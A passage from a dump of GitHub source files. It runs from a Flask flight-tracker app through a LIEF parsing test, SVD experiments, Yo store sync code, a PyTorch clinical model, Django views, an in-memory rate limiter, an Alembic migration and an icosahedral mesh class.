requests.get(\"http://127.0.0.1:5000/get-storeddata\").json()\n\n # results is a dictionary of dictionaries\n counts = {} # defaultdict(Counter)\n\n for flight in resp_json:\n departure_airport = flight.get('departure').get('iataCode')\n arrival_airport = flight.get('arrival').get('iataCode')\n route = f'{departure_airport}-{arrival_airport}'\n counts[route] = counts.get(route, 0) + 1\n\n results = []\n for route, flights in counts.items():\n departure = route.split('-')[0]\n arrival = route.split('-')[1]\n\n results.append({\n 'departure': departure,\n 'departure_coords': airport_coords[departure],\n 'arrival': arrival,\n 'arrival_coords': airport_coords[arrival],\n 'flights': flights\n })\n\n results = sorted(results, key=lambda x: x['departure'])\n\n return jsonify(results)\n\n\n@app.route(\"/post-flighttracker\")\ndef post_flight_tracker():\n\n base_url = 'http://aviation-edge.com/v2/public/flights'\n params = {'key': api_key,\n 'depIata': 'DEN'\n }\n\n result_json = requests.get(base_url, params=params).json()\n\n # insert to the Mongo database\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[\"flight_app\"]\n mycol = mydb[\"flighttracker\"]\n # x = mycol.insert_many(result_json)\n\n mycol.create_index([(\"aircraft\", pymongo.ASCENDING),\n (\"airline\", pymongo.ASCENDING),\n (\"arrival\", pymongo.ASCENDING),\n (\"departure\", pymongo.ASCENDING),\n (\"flight\", pymongo.ASCENDING),\n (\"geography\", pymongo.ASCENDING),\n (\"speed\", pymongo.ASCENDING),\n (\"status\", pymongo.ASCENDING),\n (\"system\", pymongo.ASCENDING)\n ], unique=True)\n\n for data in result_json:\n try:\n mycol.insert_one(data)\n except:\n pass\n\n return \"Posting Done\"\n\n\n@app.route(\"/get-flighttracker\")\ndef get_flight_tracker():\n\n results = []\n flights = mongo.db.flighttracker.find()\n\n for flight in flights:\n flight['_id'] = str(flight['_id'])\n results.append(flight)\n\n return jsonify(results)\n\n\n@app.route(\"/post-airportinfo\")\ndef post_airport():\n\n base_url = 'http://aviation-edge.com/v2/public/airportDatabase'\n params = {'key': api_key}\n\n result_json = requests.get(base_url, params=params).json()\n\n # insert to the Mongo database\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[\"flight_app\"]\n mycol = mydb[\"airport\"]\n\n mycol.create_index([(\"airportId\", pymongo.ASCENDING),\n (\"nameAirport\", pymongo.ASCENDING),\n (\"codeIataAirport\", pymongo.ASCENDING),\n (\"codeIcaoAirport\", pymongo.ASCENDING)\n ], unique=True)\n\n for data in result_json:\n # if (data.get('nameCountry') == 'United States'):\n try:\n mycol.insert_one(data)\n except:\n pass\n\n return \"Posting Done\"\n\n\n@app.route(\"/get-airportinfo\")\ndef get_airport():\n\n results = []\n airports = mongo.db.airport.find()\n\n for airport in airports:\n airport['_id'] = str(airport['_id'])\n results.append(airport)\n\n return jsonify(results)\n\n\n@app.route(\"/post-cityinfo\")\ndef post_cities():\n\n base_url = 'https://aviation-edge.com/v2/public/cityDatabase'\n params = {'key': api_key}\n\n result_json = requests.get(base_url, params=params).json()\n\n # insert to the Mongo database\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[\"flight_app\"]\n mycol = mydb[\"cities\"]\n\n mycol.create_index([(\"cityId\", pymongo.ASCENDING),\n (\"nameCity\", pymongo.ASCENDING),\n (\"codeIataCity\", pymongo.ASCENDING),\n (\"codeIso2Country\", pymongo.ASCENDING)\n ], unique=True)\n\n for data in result_json:\n try:\n mycol.insert_one(data)\n except:\n pass\n\n return \"Posting Done\"\n\n\n@app.route(\"/get-cityinfo\")\ndef get_cities():\n\n results = []\n cities = mongo.db.cities.find()\n\n for city in cities:\n city['_id'] = str(city['_id'])\n results.append(city)\n\n return jsonify(results)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"ktung1189/Project_Flight-master","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16278138700","text":"#!/usr/bin/env python\nimport unittest\nimport lief\nimport logging\nimport io\nfrom io import open as io_open\nfrom unittest import TestCase\nfrom utils import get_sample\n\nfrom lief import Logger\nLogger.set_level(lief.LOGGING_LEVEL.WARNING)\n\nclass TestPythonApi(TestCase):\n\n def setUp(self):\n self.logger = logging.getLogger(__name__)\n\n def test_io(self):\n lspath = get_sample('ELF/ELF64_x86-64_binary_ls.bin')\n\n ls = lief.parse(lspath)\n self.assertIsNotNone(ls.abstract.header)\n\n with io_open(lspath, 'r') as f:\n ls = lief.parse(f)\n self.assertIsNotNone(ls.abstract.header)\n\n with io_open(lspath, 'rb') as f:\n ls = lief.parse(f)\n self.assertIsNotNone(ls.abstract.header)\n\n with io_open(lspath, 'rb') as f:\n ls = lief.ELF.parse(f)\n self.assertIsNotNone(ls.abstract.header)\n\n with io_open(get_sample('PE/PE64_x86-64_binary_HelloWorld.exe'), 'rb') as f:\n binary = lief.PE.parse(f)\n self.assertIsNotNone(binary.abstract.header)\n\n with io_open(get_sample('MachO/MachO64_x86-64_binary_dd.bin'), 'rb') as f:\n binary = lief.MachO.parse(f)[0]\n self.assertIsNotNone(binary.abstract.header)\n\n with open(lspath, 'rb') as f: # As bytes\n ls = lief.parse(f.read())\n self.assertIsNotNone(ls.abstract.header)\n\n with open(lspath, 'rb') as f: # As io.BufferedReader\n ls = lief.parse(f)\n self.assertIsNotNone(ls.abstract.header)\n\n with open(lspath, 'rb') as f: # As io.BytesIO object\n bytes_stream = io.BytesIO(f.read())\n self.assertIsNotNone(bytes_stream)\n\n\nif __name__ == '__main__':\n\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n root_logger.addHandler(ch)\n\n unittest.main(verbosity=2)\n","repo_name":"JimmyJones97/Analysis","sub_path":"app/src/main/cpp/LIEF-0.10.1/tests/api/test_python.py","file_name":"test_python.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"17016245196","text":"import scipy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.sparse.linalg import svds\nfrom fire import Fire\nfrom tqdm import tqdm\nfrom types import SimpleNamespace\nimport pandas as pd\nimport signal, sys, time\n\nterminate = False\n\n\ndef signal_handling(signum, frame):\n global terminate\n terminate = True\n # print(terminate)\n\n\ndef randomizedSVD(A, c=10, rank=10):\n # Drineas et. al\n m, n = A.shape\n fnorm = np.linalg.norm(A)\n\n colprobs = np.array([np.linalg.norm(col) ** 2 / fnorm**2 for col in A.T])\n colidx = np.random.choice(range(n), c, p=colprobs)\n\n B = A[:, colidx]\n for i in range(c):\n B[:, i] = B[:, i] / np.sqrt(colprobs[i] * c)\n\n U, Sigma, Vt = svds(B, k=rank)\n\n # get the V for svd of A\n V = A.T @ U[:, :rank] # (V Sigma U^T) @ U = V @ Sigma\n # normalize\n for i in range(V.shape[1]):\n V[:, i] = V[:, i] / np.linalg.norm(V[:, i])\n\n return U, Sigma, V\n\n\ndef relerr(Mrhat, Mr, niters=1000):\n # power method for ||Mrhat Mrhat.T - Mr Mr.T|| and ||Mr Mr.T||\n x = np.random.rand(Mrhat.shape[0])\n x = x / np.linalg.norm(x)\n\n t = np.random.rand(Mr.shape[0])\n t = t / np.linalg.norm(t)\n\n for i in range(niters):\n # for ||Mrhat Mrhat.T - Mr Mr.T||\n y = Mr.T @ x\n y = Mr @ y\n\n z = Mrhat.T @ x\n z = Mrhat @ z\n\n x = z - y\n x = x / np.linalg.norm(x) # for || Mrhat Mrhat.T - Mr Mr.T ||\n\n # for ||Mr Mr.T||\n t = Mr.T @ t\n t = Mr @ t\n t = t / np.linalg.norm(t)\n\n return np.linalg.norm(Mrhat @ (Mrhat.T @ x) - Mr @ (Mr.T @ x)) / np.linalg.norm(\n Mr @ (Mr.T @ t)\n )\n\n\ndef approximate(r=10):\n global terminate\n m = 1000\n n = 100000\n r = r\n\n X = scipy.linalg.orth(np.random.rand(m, m))\n Y = scipy.linalg.orth(np.random.rand(n, m))\n D = np.zeros((m, m))\n for i in range(m):\n D[i, i] = r - i + 1 if i <= r else 4e-3\n\n A = X @ D @ Y.T\n\n res = SimpleNamespace(**{\"cU\": [], \"cV\": [], \"eU\": [], \"eV\": []})\n ntrials = 10\n\n # for V\n pbar = tqdm(range(50, 1000, 50), colour=\"GREEN\")\n for c in pbar:\n if c<=r: continue\n avg = 0\n for _ in tqdm(range(ntrials), colour=\"RED\", leave=False):\n V, S, U = randomizedSVD(A.T, c=c, rank=r)\n Vr = Y[:, :r]\n Vrhat = V\n avg += relerr(Vrhat, Vr)\n\n e = avg / ntrials\n res.cV.append(c)\n res.eV.append(e)\n pbar.set_postfix({\"cV\": c, \"eV\": e})\n\n if terminate:\n print('terminating V')\n break\n\n sns.lineplot(x=res.cV, y=res.eV)\n plt.xlabel(\"cV\")\n plt.ylabel(\"eV\")\n plt.savefig(f\"plots/r{r}v.png\")\n\n # for U\n pbar = tqdm(range(100, 5000, 100), colour=\"GREEN\")\n for c in pbar:\n if c<=r: continue\n avg = 0\n for _ in tqdm(range(ntrials), colour=\"RED\", leave=False):\n U, S, V = randomizedSVD(A, c=c, rank=r)\n Urhat = U\n Ur = X[:, :r]\n avg += relerr(Urhat, Ur)\n\n e = avg / ntrials\n res.cU.append(c)\n res.eU.append(e)\n pbar.set_postfix({\"cU\": c, \"eU\": e})\n\n if terminate:\n print('terminating U')\n break\n\n plt.clf()\n sns.lineplot(x=res.cU, y=res.eU)\n plt.xlabel(\"cU\")\n plt.ylabel(\"eU\")\n plt.savefig(f\"plots/r{r}u.png\")\n\n pd.DataFrame({\"cU\": res.cU, \"eU\": res.eU}).to_csv(f\"results/r{r}U.csv\")\n pd.DataFrame({\"cV\": res.cV, \"eV\": res.eV}).to_csv(f\"results/r{r}V.csv\")\n\n\nif __name__ == \"__main__\":\n signal.signal(signal.SIGINT, signal_handling)\n sns.set_theme()\n Fire(approximate)\n","repo_name":"sampadbm/sampadbm.github.io","sub_path":"notes/ee546-mathematics-of-high-dimensional-data/hw3/q2/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8186000091","text":"# -*- coding: utf-8 -*-\n\n\"\"\"YoStore operations package.\"\"\"\n\nfrom flask import current_app\nfrom mongoengine import MultipleObjectsReturned, DoesNotExist\n\nfrom .accounts import get_user, update_user\nfrom .core import cache\nfrom .errors import APIError\nfrom .helpers import iso8601_to_usec\nfrom .models import YoStore, StoreCategory, WatchPromo\n\ndef update_yo_store(store_json):\n\n discarded = []\n upserted = []\n for i, item in enumerate(store_json):\n name = item.get('name')\n region = item.get('region')\n \n if not (item.get('name') and item.get('region')):\n message = 'Tried to update with incomplete information: %s %s.'\n message = message % (name, region)\n current_app.log_error(message)\n discarded.append(item)\n continue\n store_item = _get_store_item(name, region)\n if not store_item:\n message = 'Tried to update %s %s but multiple objects were returned'\n message = message % (name, region)\n current_app.log_error(message)\n discarded.append(item)\n continue\n\n is_official = item.get('isofficial')\n is_official = bool(is_official) or False\n in_carousel = bool(item.get('isfeatured')) or False\n needs_location = bool(item.get('needslocation')) or False\n added_at = item.get('datecreated') or None\n try:\n added_at = iso8601_to_usec(added_at)\n except Exception as err:\n message = 'Error converting datecreated for %s %s'\n message = message % (name, region)\n current_app.log_error(message)\n username = item.get('username') or None\n if username:\n yoall_limit = item.get('yoall_limit')\n _update_user_in_store(username, True, yoall_limit)\n screenshots = item.get('screenshots', '').split(',')\n screenshots = [s.strip() for s in screenshots if s.strip()]\n categories = item.get('category', '').split(',')\n categories = [c.strip() for c in categories if c.strip()]\n\n store_item.rank = i\n store_item.description = item.get('sendsyowhen')\n store_item.category = categories or None\n store_item.username = username\n store_item.url = item.get('url') or None\n store_item.is_official = is_official\n store_item.added_at = added_at\n store_item.carousel_picture = item.get('carouselpicture') or None\n store_item.in_carousel = in_carousel\n store_item.needs_location = needs_location\n store_item.profile_picture = item.get('profilepicture') or None\n store_item.featured_screenshots = screenshots or None\n store_item.name = name\n store_item.region = region\n store_item.save()\n\n upserted.append(store_item)\n\n deleted = YoStore.objects(id__nin=[str(u.id) for u in upserted])\n for store_item in deleted:\n if store_item.username:\n _update_user_in_store(store_item.username, None)\n deleted_items = [(str(i.id), i.name, i.region) for i in deleted]\n upserted = [(str(i.id), i.name, i.region) for i in upserted]\n deleted.delete()\n clear_get_store_items_cache()\n\n return {'discarded': discarded,\n 'deleted': deleted_items, \n 'upserted': upserted}\n\n\ndef clear_get_store_items_cache():\n cache.delete_memoized(_get_store_items)\n cache.delete_memoized(_get_store_item)\n\n\ndef get_store_items(regions=None):\n store_items = _get_store_items()\n if regions:\n filtered_store_items = []\n for i in store_items:\n if i.region in regions or i.region == 'World':\n filtered_store_items.append(i)\n\n return filtered_store_items\n else:\n return store_items\n\n\ndef _update_user_in_store(username, in_store, yoall_limit=None):\n yoall_limits = str(yoall_limit) + ' per hour' if yoall_limit else None\n try:\n user = get_user(username=username)\n update_user(user, in_store=in_store, yoall_limits=yoall_limits)\n except APIError:\n message = 'Unable to update %s in_store to %s'\n message = message % (username, in_store)\n current_app.logger.warning(message)\n\n\n@cache.memoize()\ndef _get_store_items():\n return list(YoStore.objects.all().order_by('rank'))\n\n\n@cache.memoize()\ndef _get_store_item(name, region):\n try:\n item = YoStore.objects(name=name, region=region).get()\n return item\n except DoesNotExist:\n return YoStore()\n except MultipleObjectsReturned:\n return None\n\n\ndef update_store_categories(category_json):\n\n discarded = []\n upserted = []\n for i, item in enumerate(category_json):\n category = item.get('category')\n region = item.get('region')\n \n if not (category and region):\n message = 'Tried to update with incomplete information: %s %s.'\n message = message % (category, region)\n current_app.log_error(message)\n discarded.append(item)\n continue\n store_category = _get_store_category(category, region)\n if not store_category:\n message = 'Tried to update %s %s but multiple objects were returned'\n message = message % (category, region)\n current_app.log_error(message)\n discarded.append(item)\n continue\n\n store_category.category = category\n store_category.rank = i\n store_category.region = region\n store_category.save()\n\n upserted.append(store_category)\n\n deleted = StoreCategory.objects(id__nin=[str(u.id) for u in upserted])\n deleted_items = [(str(i.id), i.category, i.region) for i in deleted]\n upserted = [(str(i.id), i.category, i.region) for i in upserted]\n deleted.delete()\n clear_get_store_categories_cache()\n\n return {'discarded': discarded,\n 'deleted': deleted_items, \n 'upserted': upserted}\n\n\ndef clear_get_store_categories_cache():\n cache.delete_memoized(_get_store_categories)\n cache.delete_memoized(_get_store_category)\n\n\ndef get_store_categories(regions=None):\n store_categories = _get_store_categories()\n if regions:\n store_categories = [i for i in store_categories if i.region in regions]\n\n return store_categories\n\n\n@cache.memoize()\ndef _get_store_categories():\n return list(StoreCategory.objects.all().order_by('rank'))\n\n\n@cache.memoize()\ndef _get_store_category(category, region):\n try:\n item = StoreCategory.objects(category=category, region=region).get()\n return item\n except DoesNotExist:\n return StoreCategory()\n except MultipleObjectsReturned:\n return None\n\ndef update_watch_promo_items(promo_json):\n\n discarded = []\n upserted = []\n for i, item in enumerate(promo_json):\n username = item.get('username')\n\n if not username:\n message = 'Tried to update with incomplete information: %s.'\n message = message % username\n current_app.log_error(message)\n discarded.append(item)\n continue\n promo_item = _get_watch_promo_item(username)\n\n promo_item.rank = i\n promo_item.username = username\n promo_item.description = item.get('description') or None\n promo_item.url = item.get('link') or None\n promo_item.profile_picture = item.get('profilepicture') or None\n promo_item.preview_picture = item.get('previewpicture') or None\n promo_item.save()\n\n upserted.append(promo_item)\n\n deleted = WatchPromo.objects(id__nin=[str(u.id) for u in upserted])\n deleted_items = [(str(i.id), i.username) for i in deleted]\n upserted = [(str(i.id), i.username) for i in upserted]\n deleted.delete()\n clear_get_watch_promo_cache()\n\n return {'discarded': discarded,\n 'deleted': deleted_items,\n 'upserted': upserted}\n\n\ndef clear_get_watch_promo_cache():\n cache.delete_memoized(_get_watch_promo_item)\n cache.delete_memoized(get_watch_promo_items)\n\n\n@cache.memoize()\ndef get_watch_promo_items():\n return list(WatchPromo.objects.all().order_by('rank'))\n\n\n@cache.memoize()\ndef _get_watch_promo_item(username):\n try:\n item = WatchPromo.objects(username=username).get()\n return item\n except DoesNotExist:\n return WatchPromo()\n","repo_name":"YoApp/yo-api","sub_path":"yoapi/yostore.py","file_name":"yostore.py","file_ext":"py","file_size_in_byte":8311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"159010586","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import logging\n\nimport numpy as np\nimport torch\n\n\nclass MimicModel(torch.nn.Module):\n\n def __init__(\n self,\n model_type,\n input_size,\n use_attention,\n rnn_hidden_size,\n rnn_type,\n rnn_layers,\n rnn_dropout,\n rnn_bidirectional,\n lr_pooling=\"mean\",\n lr_history_window=None,\n ):\n \"\"\"Builds model.\n\n Args:\n model_type: `lr` or `rnn`.\n input_size: Dimension of input vector.\n rnn_hidden_size: Dimension of hidden embeddings.\n rnn_type: `LSTM` or `GRU`.\n num_layers: Number of layers for stacked LSTM.\n dropout: Float, dropout rate.\n rnn_bidirectional: True if using bidirectional LSTM otherwise False.\n use_attention: True if using attention mechanism otherwise False.\n lr_pooling: `concat`, `last`, `mean` or `max`.\n \"\"\"\n super(MimicModel, self).__init__()\n\n self.model_type = model_type\n self.input_size = input_size\n self.rnn_hidden_size = rnn_hidden_size\n self.rnn_type = rnn_type\n self.rnn_layers = rnn_layers\n self.rnn_dropout = rnn_dropout\n self.rnn_bidirectional = rnn_bidirectional\n self.use_attention = use_attention\n self.lr_pooling = lr_pooling\n self.lr_history_window = lr_history_window\n\n if self.rnn_type == \"lstm\":\n module = torch.nn.LSTM\n elif self.rnn_type == \"gru\":\n module = torch.nn.GRU\n else:\n raise ValueError(\"Only `LSTM` and `GRU` are supported `rnn_type`.\")\n\n if self.model_type == \"rnn\" and self.rnn_bidirectional:\n self.rnn_hidden_size = self.rnn_hidden_size // 2\n\n if self.model_type == \"rnn\":\n self.rnn_module = module(\n input_size=self.input_size,\n hidden_size=self.rnn_hidden_size,\n batch_first=True,\n num_layers=self.rnn_layers,\n dropout=self.rnn_dropout,\n bidirectional=self.rnn_bidirectional)\n\n self.rnn_linear = torch.nn.Linear(\n in_features=self.rnn_hidden_size * (self.rnn_bidirectional + 1),\n out_features=1)\n\n if self.use_attention:\n self.attention_layer = torch.nn.Linear(\n in_features=self.rnn_hidden_size * (self.rnn_bidirectional + 1),\n out_features=1)\n\n if self.model_type == \"lr\":\n if self.use_attention:\n self.attention_layer = torch.nn.Linear(\n in_features=self.input_size, out_features=1)\n\n self.lr_linear = torch.nn.Linear(\n in_features=self.input_size, out_features=1)\n elif self.lr_pooling == \"concat\":\n self.lr_linear = torch.nn.Linear(\n in_features=self.input_size * self.lr_history_window,\n out_features=1)\n else:\n self.lr_linear = torch.nn.Linear(\n in_features=self.input_size, out_features=1)\n return\n\n def forward(self, inputs):\n \"\"\"Performs forward computation.\n\n Args:\n inputs: (batch, sequence_length, input_size)\n\n Returns:\n logits: (batch,)\n endpoints: Dictionary of auxiliary information.\n \"\"\"\n if self.model_type == \"rnn\":\n if self.use_attention:\n return self._attentional_rnn_forward(inputs)\n else:\n return self._rnn_forward(inputs)\n elif self.model_type == \"lr\":\n if self.use_attention:\n return self._attentional_lr_forward(inputs)\n else:\n return self._lr_baseline_forward(inputs)\n else:\n raise ValueError(\"Only `lr` and `rnn` are supported `model_type`.\")\n\n def _rnn_forward(self, inputs):\n outputs, aux_states = self.rnn_module(inputs)\n output_embedding = aux_states[0]\n\n if self.rnn_bidirectional:\n output_embedding = output_embedding.transpose(0, 1).reshape(\n outputs.shape[0], self.rnn_hidden_size * 2)\n else:\n output_embedding = output_embedding.squeeze(dim=0)\n\n logits = self.rnn_linear(output_embedding).squeeze(1)\n\n endpoints = {\"outputs\": outputs, \"aux_states\": aux_states}\n\n return logits, endpoints\n\n def _attentional_rnn_forward(self, inputs):\n outputs, aux_states = self.rnn_module(inputs)\n\n attention = self.attention_layer(outputs)\n attention_score = torch.nn.functional.softmax(attention, dim=1)\n\n output_embedding = torch.sum(attention_score * outputs, dim=1)\n logits = self.rnn_linear(output_embedding).squeeze(1)\n\n endpoints = {\n \"attention_scores\": attention_score,\n \"outputs\": outputs,\n \"aux_states\": aux_states,\n }\n\n return logits, endpoints\n\n def _lr_baseline_forward(self, inputs):\n if self.lr_pooling == \"mean\":\n inputs = torch.mean(inputs, dim=1)\n elif self.lr_pooling == \"last\":\n inputs = inputs[:, -1, :]\n elif self.lr_pooling == \"concat\":\n batch_size = inputs.shape[0]\n inputs = torch.reshape(inputs, [batch_size, -1])\n elif self.lr_pooling == \"max\":\n inputs, _ = torch.max(inputs, dim=1)\n else:\n raise ValueError(\n \"Only `mean`, `last`, `concat` and `max` are supported `lr_pooling`.\")\n\n logits = self.lr_linear(inputs).squeeze(1)\n\n return logits, {}\n\n def _attentional_lr_forward(self, inputs):\n attention = self.attention_layer(inputs)\n attention_score = torch.nn.functional.softmax(attention, dim=1)\n output_embedding = torch.sum(attention_score * inputs, dim=1)\n logits = self.lr_linear(output_embedding).squeeze(1)\n endpoints = {\"attention_scores\": attention_score}\n return logits, endpoints\n","repo_name":"zhmd/monitor_icu","sub_path":"code/model_builder.py","file_name":"model_builder.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10266798385","text":"from django.shortcuts import render,HttpResponse\nfrom main_page.forms import SignupForm, ContactForm\nfrom django.core.mail import send_mail\nfrom ecomm import settings\n\nfrom .models import Signup\nfrom products.models import ProductFeatured\n\n\n# Create your views here.\ndef index(request):\n title = 'welcome'\n featured_image=ProductFeatured.objects.first()\n form = SignupForm(request.POST or None)\n context={'title':title,'form':form,'featured_image':featured_image}\n if form.is_valid():\n instance=form.save(commit=False)\n email= form.cleaned_data['email']\n email_save,created=Signup.objects.get_or_create(email=email)\n title = 'thank you'\n context={'title':title}\n\n\n return render(request,'index.html',context)\n\ndef contact(request):\n title='Contact Us'\n contact_info=ContactForm(request.POST or None)\n if contact_info.is_valid():\n # contact_info.save(commit=False)\n name = contact_info.cleaned_data['name']\n email= contact_info.cleaned_data['email']\n phone= contact_info.cleaned_data['phone']\n message=contact_info.cleaned_data['message']\n from_msg = settings.EMAIL_HOST_USER\n subject=('from: '+name+' email: '+email + 'phone: '+str(phone))\n\n send_mail(subject , message, from_msg,[from_msg], fail_silently=False)\n\n return render(request,'contact.html',{'contact_info':contact_info, 'title':title})","repo_name":"acamogh/django_shoppingCart","sub_path":"main_page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17560875953","text":"import threading\nimport time\nfrom collections import Counter\nfrom typing import Counter as CounterType\nfrom typing import Dict, List, Optional\n\nfrom . import MovingWindow\n\n\nclass _LockableEntry:\n __slots__ = (\"atime\", \"expiry\", \"_lock\")\n\n def __init__(self, expiry: float):\n self.atime: float = time.time()\n self.expiry: float = self.atime + expiry\n\n self._lock = threading.RLock()\n\n def acquire(self) -> None:\n self._lock.acquire()\n\n def release(self) -> None:\n self._lock.release()\n\n def __enter__(self):\n self.acquire()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.release()\n\n def __repr__(self) -> str:\n return f\"MemoryLockableEntry\" # pragma: no cover\n\n\nclass MemoryStorage:\n \"\"\"\n rate limit storage using :py:class:`collections.Counter`\n as an in memory storage for fixed and elastic window strategies,\n and a simple list to implement moving window strategy.\n \"\"\"\n\n def __init__(self) -> None:\n self.storage: CounterType[str] = Counter()\n self.expirations: Dict[str, float] = {}\n self.events: Dict[str, List[_LockableEntry]] = {}\n\n self.timer = threading.Timer(0.01, self.__expire_events)\n self.timer.start()\n\n def __expire_events(self) -> None:\n for key in list(self.events.keys()):\n for event in list(self.events[key]):\n with event:\n if event.expiry <= time.time() and event in self.events[key]:\n self.events[key].remove(event)\n\n for key in list(self.expirations.keys()):\n if self.expirations[key] <= time.time():\n self.storage.pop(key, None)\n self.expirations.pop(key, None)\n\n def __schedule_expiry(self) -> None:\n if not self.timer.is_alive():\n self.timer = threading.Timer(0.01, self.__expire_events)\n self.timer.start()\n\n def incr(self, key: str, expiry: int, elastic_expiry: bool = False) -> int:\n \"\"\"\n Increments the counter for the given rate limit key.\n\n :param key: The key to increment.\n :param expiry: Amount in seconds for the key to expire in.\n :param elastic_expiry: Whether to keep extending the rate limit window every hit.\n :return: The number of hits currently on the rate limit for the given key.\n \"\"\"\n\n self.get(key)\n self.__schedule_expiry()\n self.storage[key] += 1\n if elastic_expiry or self.storage[key] == 1:\n self.expirations[key] = time.time() + expiry\n return self.storage.get(key, 0)\n\n def get(self, key: str) -> int:\n \"\"\"\n Retrieve the current request count for the given rate limit key.\n\n :param key: The key to get the counter value for.\n \"\"\"\n\n if self.expirations.get(key, 0) <= time.time():\n self.storage.pop(key, None)\n self.expirations.pop(key, None)\n return self.storage.get(key, 0)\n\n def clear(self, key: str) -> None:\n \"\"\"\n Resets the rate limit for the given key.\n\n :param key: The key to clear rate limits for.\n \"\"\"\n self.storage.pop(key, None)\n self.expirations.pop(key, None)\n self.events.pop(key, None)\n\n def acquire_entry(self, key: str, limit: int, expiry: int, no_add: bool = False) -> bool:\n \"\"\"\n :param key: The rate limit key to acquire an entry in.\n :param limit: The total amount of entries allowed before hitting the rate limit.\n :param expiry: Amount in seconds for the acquired entry to expire in.\n :param no_add: If False, an entry is not actually acquired but instead serves as a 'check'.\n \"\"\"\n\n self.events.setdefault(key, [])\n self.__schedule_expiry()\n timestamp = time.time()\n entry: Optional[_LockableEntry]\n try:\n entry = self.events[key][limit - 1]\n except IndexError:\n entry = None\n\n if entry and entry.atime > timestamp - expiry:\n return False\n else:\n if not no_add:\n self.events[key].insert(0, _LockableEntry(expiry))\n return True\n\n def get_expiry(self, key: str) -> float:\n \"\"\"\n Retrieve the expected expiry time for the given rate limit key.\n\n :param key: The key to get the expiry time for.\n :return: The time at which the current rate limit for the given key ends.\n \"\"\"\n\n return self.expirations.get(key, -1)\n\n def get_num_acquired(self, key: str, expiry: int) -> int:\n \"\"\"\n returns the number of entries already acquired\n\n :param key: rate limit key to acquire an entry in\n :param expiry: expiry of the entry\n \"\"\"\n\n timestamp = time.time()\n if self.events.get(key):\n return len([k for k in self.events[key] if k.atime > timestamp - expiry])\n else:\n return 0\n\n def get_moving_window(self, key: str, limit: int, expiry: int) -> MovingWindow:\n \"\"\"\n Retrieves the starting point and the number of entries in the moving window.\n\n :param key: The rate limit key to retrieve statistics about.\n :param limit: The total amount of entries allowed before hitting the rate limit.\n :param expiry: Amount in seconds for the acquired entry to expire in.\n :return: (start of window, number of acquired entries)\n \"\"\"\n\n timestamp = time.time()\n acquired = self.get_num_acquired(key, expiry)\n for item in self.events.get(key, []):\n if item.atime > timestamp - expiry:\n return MovingWindow(item.atime, acquired)\n return MovingWindow(timestamp, acquired)\n\n def check(self) -> bool:\n \"\"\"\n Check if the connection to the storage backend is healthy.\n \"\"\"\n\n return True\n\n def reset(self) -> None:\n self.storage.clear()\n self.expirations.clear()\n self.events.clear()\n\n\n__all__ = [\n \"MemoryStorage\",\n]\n","repo_name":"djmattyg007/freiner","sub_path":"freiner/storage/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34173194315","text":"\"\"\"rename user table\n\nRevision ID: 44e9a4a2ddb5\nRevises: 63b0daed7f08\nCreate Date: 2023-09-07 20:34:06.547286\n\n\"\"\"\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"44e9a4a2ddb5\"\ndown_revision = \"63b0daed7f08\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n op.rename_table(\"user\", \"credere_user\")\n op.drop_constraint(\"application_action_user_id_fkey\", \"application_action\", type_=\"foreignkey\")\n op.create_foreign_key(None, \"application_action\", \"credere_user\", [\"user_id\"], [\"id\"])\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n op.rename_table(\"credere_user\", \"user\")\n op.drop_constraint(None, \"application_action\", type_=\"foreignkey\")\n op.create_foreign_key(\n \"application_action_user_id_fkey\",\n \"application_action\",\n \"user\",\n [\"user_id\"],\n [\"id\"],\n )\n # ### end Alembic commands ###\n","repo_name":"open-contracting/credere-backend","sub_path":"migrations/versions/44e9a4a2ddb5_rename_user_table.py","file_name":"44e9a4a2ddb5_rename_user_table.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35098161665","text":"from pyglobe3d.core.common.const_attrs import ConstantAttributes\nfrom pyglobe3d.core.icosalogic.edge import Edge\nfrom pyglobe3d.core.icosalogic.grid_consts import Grid\nfrom pyglobe3d.core.icosalogic.icosahedron import Icosahedron\nfrom pyglobe3d.core.icosalogic.node import Node\nfrom pyglobe3d.core.icosalogic.triangle import Triangle\n\n\nclass Mesh(ConstantAttributes):\n def __init__(self, partition: int = 1):\n self.GRID = Grid(partition=partition)\n # 30 edges of the icosahedron:\n self.EDGES = tuple(Edge(grid=self.GRID, index=index) for index in range(0, self.GRID.NUMBER_OF_EDGES))\n # 12 icosahedron nodes:\n self.ICOSAHEDRON_NODES = Icosahedron(grid=self.GRID).icosahedron_nodes\n\n @property\n def partition(self):\n return self.GRID.PARTITION\n\n 